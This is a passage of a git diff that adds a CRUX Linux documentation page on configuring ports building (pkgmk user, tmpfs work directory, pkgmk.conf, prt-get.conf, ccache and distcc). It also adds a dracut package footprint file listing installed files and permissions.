+        <a href="configure.html#chroot">inside chroot</a>.</p>
+
+        <h2 id="filesystem">1.4.1. Ports Layout</h2>
+
+	<p>Make sure follow directories exist;</p>
+
+	<pre>
+	#  mkdir /usr/ports
+	#  mkdir -p /usr/ports/{distfiles,packages,work,pkgbuild}
+	</pre>
+
+        <h2 id="fakeroot">1.4.2. Build as user</h2>
+
+        <p>For more information read
+	<a href="https://crux.nu/Wiki/FakerootPorts">Fakeroot Ports</a>.
+	Add a user that will be used by ports tools, this example pkgmk;</p>
+
+        <pre>
+        # useradd -r -U -d /usr/ports -s /bin/false pkgmk
+        </pre>
+
+        <p>You can add your self to group pkgmk. Check if members of this
+        group are under <a href="linux.html#sysctl">tpe</a> protection.</p>
+
+        <pre>
+        # usermod -a -G pkgmk username
+        </pre>
+
+        <pre>
+	#  chown pkgmk /usr/ports/{distfiles,packages,work,pkgbuild}
+	#  chown pkgmk:pkgmk /usr/ports/pkgbuild
+	#  chmod g+w /usr/ports/pkgbuild
+        </pre>
+
+        <p>Configure to
+        <a href="https://crux.nu/Wiki/HowToSpeedUpBuildingPackages#ram">compile in ram</a>
+        average of 3GB is recommended for core while firefox need at least 30G.
+	Discover id of pkgmk user;</p>
+
+        <pre>
+        # id pkgmk
+        uid=102(pkgmk) gid=102(pkgmk) groups=102(pkgmk)
+        </pre>
+
+        <p>Edit fstab, change uid to id of pkgmk, this example 102;</p>
+
+        <pre>
+        pkgmk /usr/ports/work tmpfs size=30G,uid=102,defaults,mode=0750 0 0
+        </pre>
+
+        <h2 id="pkgmk">1.4.3. Configure pkgmk</h2>
+
+        <p>Read <a href="https://crux.nu/Handbook3-3#ntoc22">4.5. Adjust/Configure the Package Build Process</a>
+        to take advantage of your specific hardware. Packages build with
+        native flag will not run on different hardware. This is the best choice
+        if you want gcc to find the best settings based on your hardware.</p>
+
+        <p>Edit /etc/pkgmk.conf, remove pipe from compiler flags and let the system
+        get from nproc how many cpu's it can use for compiling;</p>
+
+        <pre>
+        #
+        # /etc/pkgmk.conf: pkgmk(8) configuration
+        #
+
+        export CFLAGS="-O2 -march=x86-64"
+        export CXXFLAGS="${CFLAGS}"
+
+        export JOBS=$(nproc)
+        export MAKEFLAGS="-j $JOBS"
+
+        case ${PKGMK_ARCH} in
+                "64"|"")
+                        ;;
+                "32")
+                        export CFLAGS="${CFLAGS} -m32"
+                        export CXXFLAGS="${CXXFLAGS} -m32"
+                        export LDFLAGS="${LDFLAGS} -m32"
+                        export PKG_CONFIG_LIBDIR="/usr/lib32/pkgconfig"
+                        ;;
+                *)
+                        echo "Unknown architecture selected! Exiting."
+                        exit 1
+                        ;;
+        esac
+
+        PKGMK_SOURCE_MIRRORS=(https://tribu.semdestino.org/mirror-3.4/distfiles/)
+        # PKGMK_SOURCE_DIR="$PWD"
+        PKGMK_SOURCE_DIR="/usr/ports/distfiles"
+        # PKGMK_PACKAGE_DIR="$PWD"
+        PKGMK_PACKAGE_DIR="/usr/ports/packages"
+        # PKGMK_WORK_DIR="$PWD/work"
+        PKGMK_WORK_DIR="/usr/ports/work/${name}"
+        # PKGMK_DOWNLOAD="no"
+        # PKGMK_IGNORE_SIGNATURE="no"
+        # PKGMK_IGNORE_MD5SUM="no"
+        # PKGMK_IGNORE_FOOTPRINT="no"
+        # PKGMK_IGNORE_NEW="no"
+        # PKGMK_NO_STRIP="no"
+        # PKGMK_DOWNLOAD_PROG="wget"
+        # PKGMK_WGET_OPTS=""
+        # PKGMK_CURL_OPTS=""
+        # PKGMK_COMPRESSION_MODE="gz"
+
+        # End of file
+        </pre>
+
+        <p>If you want native build change the above example to;</p>
+
+        <pre>
+        export CFLAGS="-O2 -march=native -mtune=native"
+        </pre>
+
+        <p>Check <a href="toolchain.html">toolchain</a> for more options on how packages
+        are build.</p>
+
+        <h2 id="prtget">1.4.4. Configure prt-get</h2>
+
+        <p>Edit /etc/prt-get.conf;</p>
+
+        <pre>
+        ###
+        ### prt-get conf
+        ###
+
+        # note: the order matters: the package found first is used
+        prtdir /usr/ports/core
+        prtdir /usr/ports/opt
+        prtdir /usr/ports/xorg
+
+        # the following line enables the multilib compat-32 collection
+        #prtdir /usr/ports/compat-32
+
+        # the following line enables the user maintained contrib collection
+        prtdir /usr/ports/contrib
+        prtdir /usr/ports/ports
+        prtdir /usr/ports/mate
+        prtdir /usr/ports/kde5
+
+        ### use mypackage form local directory
+        # prtdir /home/packages/build:mypackage
+
+        ### log options:
+        writelog enabled         # (enabled|disabled)
+        logmode  overwrite       # (append|overwrite)
+        rmlog_on_success yes     # (no|yes)
+        logfile  /usr/ports/pkgbuild/%n.log
+                                   # path, %p=path to port dir, %n=port name
+                                   #       %v=version, %r=release
+
+        ### use alternate cache file (default: /var/lib/pkg/prt-get.cache
+        # cachefile /mnt/nfs/cache
+
+        ### print README information:
+        readme verbose           # (verbose|compact|disabled)
+
+        ### prefer higher versions in sysup / diff
+        preferhigher yes      # (yes|no)
+
+        ### use regexp search
+        # useregex no        # (yes|no)
+
+        ### run pre- and post-installs scripts; yes is equivalent to the
+        ### --install-scripts option
+        runscripts yes            # (no|yes)
+
+        ### expert section ###
+
+        ### alternative commands
+        makecommand      sudo -H -u pkgmk fakeroot pkgmk
+        addcommand       sudo pkgadd
+        removecommand    sudo pkgrm
+        runscriptcommand sudo sh
+        </pre>
+
+        <h2 id="distcc">1.4.5. Ccache and distcc</h2>
+
+        <p>Ccache avoids same code to be compiled by saving
+        the output from compilers and identifying same
+        input by using hashes and distcc distributes
+        compiling process across machines.</p>
+
+        <p>Don't set native or generic on /etc/pkgmk.conf.</p>
+        <pre>
+        $ prt-get depinst ccache distcc
+        </pre>
+
+        <p>Configure pkgmk and define number of cores available,
+        in this example get dynamically Edit 
+        <a href="conf/pkgmk.conf">/etc/pkgmk.conf</a> and
+        set ccaching directory and instructs to use distcc
+        backend;</p>
+
+        <pre>
+        # ccache settings
+        export PATH="/usr/lib/ccache/:$PATH"
+        export CCACHE_DIR="/usr/ports/ccache"
+        export CCACHE_PREFIX="distcc"
+        export CCACHE_COMPILERCHECK="%compiler% -dumpversion; crux"
+        </pre>
+
+        <p>Set distcc hosts and respective number of
+        cpu cores to send work, hosts names, exp; "worker" must
+        be configured on /etc/hosts.</p>
+
+        <pre>
+        ### compile using distcc without ccache
+        ##export PATH="/usr/lib/distcc/:$PATH"
+        ##export DISTCC_HOSTS="localhost/4,lzo,cpp xborg/4,lzo,cpp"
+        ##export PUMP_BUILD=yes
+
+        # distcc settings
+        export JOBS=$(/usr/bin/distcc -j 2> /dev/null)
+        export DISTCC_DIR="/usr/ports/distcc"
+        export MAKEFLAGS="-j ${JOBS}"
+        export SCONSFLAGS="$MAKEFLAGS"
+
+        # local compile only
+        #export JOBS=$(nproc)
+        #export MAKEFLAGS="-j $JOBS"
+        </pre>
+
+        <p>Configure distcc daemon, edit
+        /etc/rc.d/distccd;</p>
+
+        <pre>
+        #!/usr/bin/env bash
+        #
+        # /etc/rc.d/distccd: start/stop distcc daemon
+        #
+
+        . /etc/distcc.conf
+        if [ -z "$DISTCC_ALLOW" ]; then
+        </pre>
+
+        <p>Create /etc/distcc.conf;</p>
+
+        <pre>
+        DISTCC_ALLOW="10.0.0.0/8"
+        DISTCC_USER="pkgmk"
+        DISTCC_LOG_LEVEL="info"
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/ports/dracut/.footprint b/linux/ports/dracut/.footprint
new file mode 100644
index 0000000..58184f1
--- /dev/null
+++ b/linux/ports/dracut/.footprint
@@ -0,0 +1,399 @@
+-rw-r--r--	root/root	etc
+drwxr-xr-x	root/root	usr/
+drwxr-xr-x	root/root	usr/bin/
+-rwxr-xr-x	root/root	usr/bin/dracut
+-rwxr-xr-x	root/root	usr/bin/dracut-catimages
+-rwxr-xr-x	root/root	usr/bin/lsinitrd
+-rwxr-xr-x	root/root	usr/bin/mkinitrd
+drwxr-xr-x	root/root	usr/etc/
+-rw-r--r--	root/root	usr/etc/dracut.conf
+drwxr-xr-x	root/root	usr/etc/dracut.conf.d/
+drwxr-xr-x	root/root	usr/lib/
+drwxr-xr-x	root/root	usr/lib/dracut/
+lrwxrwxrwx	root/root	usr/lib/dracut/dracut-functions -> dracut-functions.sh
+-rwxr-xr-x	root/root	usr/lib/dracut/dracut-functions.sh
+-rwxr-xr-x	root/root	usr/lib/dracut/dracut-init.sh
+-rwxr-xr-x	root/root	usr/lib/dracut/dracut-initramfs-restore
+-rwxr-xr-x	root/root	usr/lib/dracut/dracut-install
+-rwxr-xr-x	root/root	usr/lib/dracut/dracut-logger.sh
+-rwxr-xr-x	root/root	usr/lib/dracut/dracut-version.sh
+drwxr-xr-x	root/root	usr/lib/dracut/dracut.conf.d/
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/00bash/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/00bash/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/00bootchart/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/00bootchart/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/00dash/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/00dash/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/00systemd-bootchart/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/00systemd-bootchart/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/00systemd/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/00systemd/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/01fips/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/01fips/fips-boot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/01fips/fips-noboot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/01fips/fips.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/01fips/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/01systemd-initrd/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/01systemd-initrd/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/02caps/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/02caps/caps.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/02caps/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/02fips-aesni/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/02fips-aesni/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/02systemd-networkd/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/02systemd-networkd/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/03modsign/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/03modsign/load-modsign-keys.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/03modsign/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/03rescue/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/03rescue/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/04watchdog/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/04watchdog/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/04watchdog/watchdog-stop.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/04watchdog/watchdog.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/05busybox/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/05busybox/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/10i18n/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/10i18n/10-console.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/10i18n/console_init.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/10i18n/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/10i18n/parse-i18n.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/30convertfs/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/30convertfs/convertfs.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/30convertfs/do-convertfs.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/30convertfs/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/dhclient-script.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/40network/dhclient.conf
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/dhcp-root.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/ifname-genrules.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/ifup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/kill-dhclient.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/net-genrules.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/net-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/netroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-bond.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-bridge.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-ibft.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-ifname.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-ip-opts.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-team.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/40network/parse-vlan.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/45ifcfg/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/45ifcfg/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/45ifcfg/write-ifcfg.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/45url-lib/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/45url-lib/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/45url-lib/url-lib.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/50drm/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50drm/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/50gensplash/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50gensplash/gensplash-emergency.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50gensplash/gensplash-newroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50gensplash/gensplash-pretrigger.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50gensplash/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/50plymouth/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50plymouth/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50plymouth/plymouth-emergency.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50plymouth/plymouth-newroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50plymouth/plymouth-populate-initrd.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/50plymouth/plymouth-pretrigger.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/80cms/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/80cms/cms-write-ifcfg.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/80cms/cmsifup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/80cms/cmssetup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/80cms/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90btrfs/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90btrfs/80-btrfs.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90btrfs/btrfs_device_ready.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90btrfs/btrfs_finished.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90btrfs/btrfs_timeout.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90btrfs/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/crypt-cleanup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/crypt-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/crypt-run-generator.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/cryptroot-ask.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/parse-crypt.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/parse-keydev.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90crypt/probe-keydev.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dm/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90dm/11-dm.rules
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90dm/59-persistent-storage-dm.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dm/dm-pre-udev.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dm/dm-shutdown.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dm/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmraid/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90dmraid/61-dmraid-imsm.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmraid/dmraid.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmraid/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmraid/parse-dm.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/apply-live-updates.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90dmsquash-live/checkisomd5@.service
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/dmsquash-generator.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/dmsquash-live-genrules.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/dmsquash-live-root.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/dmsquash-liveiso-genrules.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/iso-scan.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/parse-dmsquash-live.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90dmsquash-live/parse-iso-scan.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90kernel-modules/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90kernel-modules/insmodpost.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90kernel-modules/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90kernel-modules/parse-kernel.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90kernel-network-modules/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90kernel-network-modules/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90livenet/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90livenet/fetch-liveupdate.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90livenet/livenet-generator.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90livenet/livenetroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90livenet/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90livenet/parse-livenet.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90lvm/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90lvm/64-lvm.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90lvm/lvm_scan.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90lvm/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90lvm/parse-lvm.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90mdraid/59-persistent-storage-md.rules
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90mdraid/65-md-incremental-imsm.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/md-noddf.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/md-noimsm.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/md-shutdown.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/mdmon-pre-shutdown.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/mdmon-pre-udev.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/mdraid-cleanup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/mdraid-needshutdown.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/mdraid-waitclean.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/mdraid_start.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90mdraid/parse-md.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90multipath/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90multipath/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90multipath/multipathd-needshutdown.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90multipath/multipathd-stop.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/90multipath/multipathd.service
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90multipath/multipathd.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90qemu-net/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90qemu-net/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/90qemu/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/90qemu/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/91crypt-gpg/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/91crypt-gpg/crypt-gpg-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/91crypt-gpg/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/91crypt-loop/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/91crypt-loop/crypt-loop-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/91crypt-loop/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95cifs/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95cifs/cifs-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95cifs/cifsroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95cifs/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95cifs/parse-cifsroot.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd/parse-dasd.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd_mod/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd_mod/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd_mod/parse-dasd-mod.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd_rules/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd_rules/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95dasd_rules/parse-dasd.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95debug/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95debug/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe-uefi/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe-uefi/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe-uefi/parse-uefifcoe.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/95fcoe/cleanup-fcoe.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/fcoe-edd.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/fcoe-genrules.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/fcoe-up.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/lldpad.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fcoe/parse-fcoe.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fstab-sys/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fstab-sys/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95fstab-sys/mount-sys.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95iscsi/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95iscsi/cleanup-iscsi.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95iscsi/iscsiroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95iscsi/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95iscsi/mount-lun.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95iscsi/parse-iscsiroot.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nbd/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nbd/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nbd/nbdroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nbd/parse-nbdroot.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/nfs-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/nfs-start-rpc.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/nfsroot-cleanup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/nfsroot.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95nfs/parse-nfsroot.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95resume/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95resume/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95resume/parse-resume.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95resume/resume.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95rootfs-block/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95rootfs-block/block-genrules.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95rootfs-block/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95rootfs-block/mount-root.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95rootfs-block/parse-block.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95rootfs-block/rootfallback.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95ssh-client/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95ssh-client/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95terminfo/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95terminfo/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95udev-rules/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/95udev-rules/59-persistent-storage.rules
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/95udev-rules/61-persistent-storage.rules
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95udev-rules/load-modules.sh
